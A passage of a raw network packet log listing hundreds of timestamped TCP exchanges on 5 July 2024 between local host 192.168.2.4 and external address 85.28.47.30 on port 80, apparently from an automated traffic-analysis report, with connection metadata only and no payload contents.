                                                                Jul 5, 2024 04:36:07.194231033 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.194251060 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194262981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194273949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194284916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194298029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194309950 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.194309950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194322109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194336891 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.194364071 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.194396973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194410086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194421053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194432974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194444895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194448948 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.194458008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.194468021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.194488049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.194511890 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.282659054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.282670021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.282691956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.282701015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.282711029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.282725096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.282747984 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.282759905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.282762051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.282790899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.282996893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283041000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283072948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283082962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283101082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283111095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283118010 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283126116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283144951 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283148050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283160925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283169985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283185959 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283214092 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283246040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283255100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283282042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283293009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283293009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283323050 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283365011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283375978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283390999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283401966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283405066 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283437967 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283591986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283634901 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283652067 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283663034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283687115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283691883 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283699989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283700943 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283719063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283730030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283731937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283759117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283775091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283785105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283787012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283813000 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283818960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283829927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283832073 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283839941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283863068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283894062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283906937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283919096 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283930063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.283948898 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.283967018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284012079 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284024954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284034967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284046888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284059048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284065962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284070969 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284079075 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284085035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284101009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284132004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284482956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284542084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284553051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284590006 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284607887 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284627914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284638882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284650087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284673929 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284683943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284687042 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284696102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284723997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284734011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284816980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284827948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284837008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284852028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284862041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284864902 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284877062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284885883 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284889936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284903049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284919024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284929037 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284955025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284955978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.284959078 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284965992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284977913 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.284990072 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285001040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285007954 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285034895 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285096884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285109043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285119057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285130978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285141945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285141945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285155058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285166979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285171032 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285180092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285197020 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285216093 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285223007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285242081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285276890 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285286903 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285290003 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285303116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285315037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285329103 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285341978 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285365105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285418034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285429955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285440922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285451889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285465002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285466909 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285478115 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285489082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285494089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285509109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285512924 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285531998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285537958 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285551071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285563946 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285566092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285592079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285592079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285603046 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285645008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285656929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285667896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285679102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285691023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285701990 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285706043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285727024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285758972 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285763025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285775900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285789967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285803080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285805941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285815954 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285816908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285834074 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285856962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285890102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285902023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285921097 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285932064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285939932 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285943985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285957098 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285965919 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285969973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.285979033 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.285984039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.286007881 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.286031008 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.286071062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.286083937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.286098957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.286113024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.286124945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.286128044 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.286139011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.286150932 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.286168098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.286185980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.374593973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374620914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374633074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374644041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374667883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374682903 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374685049 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.374720097 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374727011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.374834061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374844074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374851942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374880075 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.374891043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374898911 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.374903917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374916077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374936104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374943972 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.374948025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374969006 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.374974012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.374996901 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375005960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375021935 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375046015 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375117064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375127077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375138998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375157118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375159979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375169039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375179052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375193119 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375193119 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375201941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375216007 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375246048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375413895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375425100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375459909 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375536919 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375550985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375576973 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375596046 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375694990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375710964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375721931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375731945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375747919 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375775099 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375802994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375814915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375825882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375835896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375844955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375849009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375871897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375884056 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375914097 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375925064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375933886 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375946045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375955105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375956059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375967979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375982046 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.375982046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.375996113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376010895 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376013994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376020908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376024008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376039982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376059055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376305103 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376347065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376355886 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376364946 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376389980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376420021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376430988 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376440048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376465082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376468897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376471996 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376486063 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376497030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376524925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376524925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376543999 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376549006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376560926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376568079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376570940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376584053 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376597881 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376624107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376710892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376722097 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376732111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376754045 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376769066 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376785040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376801014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376811981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376822948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376840115 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376864910 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376909018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376919985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376929998 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376940966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376950979 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376951933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376960039 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.376964092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.376986980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377010107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377058983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377075911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377087116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377094030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377099037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377110958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377110958 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:07.377124071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:07.377125978 CEST4973080192.168.2.485.28.47.30
